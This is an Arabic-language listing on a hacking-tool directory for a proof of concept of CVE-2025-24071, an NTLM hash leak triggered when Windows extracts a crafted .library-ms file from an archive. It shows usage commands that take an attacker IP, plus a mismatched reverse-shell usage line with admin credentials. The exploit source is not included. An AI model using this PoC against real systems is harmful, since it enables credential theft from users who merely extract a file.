Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24071 — إثبات مفهوم لـ CVE-2025-24071، يوضح تسرب تجزئة NTLM عبر ملف .library-ms مصمم في أرشيفات RAR/ZIP، مما يؤدي إلى تشغيل مصادقة SMB عند الاستخراج. | Kitploit
أدوات/GitHubGitHub/royall-researchers/cve-2025-24071
الاستطلاعهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلومات
GitHubroyall-researchers/cve-2025-24071

CVE-2025-24071

إثبات مفهوم لـ CVE-2025-24071، يوضح تسرب تجزئة NTLM عبر ملف .library-ms مصمم في أرشيفات RAR/ZIP، مما يؤدي إلى تشغيل مصادقة SMB عند الاستخراج.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-24071_PoC

CVE-2025-24071: تسرب تجزئة NTLM عبر استخراج RAR/ZIP وملف .library-ms

يقوم مستكشف Windows تلقائيًا ببدء طلب مصادقة SMB عند استخراج ملف .library-ms من أرشيف .rar، مما يؤدي إلى الكشف عن تجزئة NTLM. لا يحتاج المستخدم إلى فتح الملف أو تشغيله—فقط استخراجه كافٍ لبدء التسريب.

الاستخدام

root@kitploit:~

>>python poc.py

>>enter file name: your file name

>>enter IP: attacker IP
root@kitploit:~
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888

تحديث:

تحديث: قامت Microsoft بتغيير رقم CVE الخاص بها. تم تحديث رقم CVE الذي كانت قد حددته سابقًا، CVE-2025-24071، إلى CVE-2025-24054.🤷‍♂

تنزيل الأداة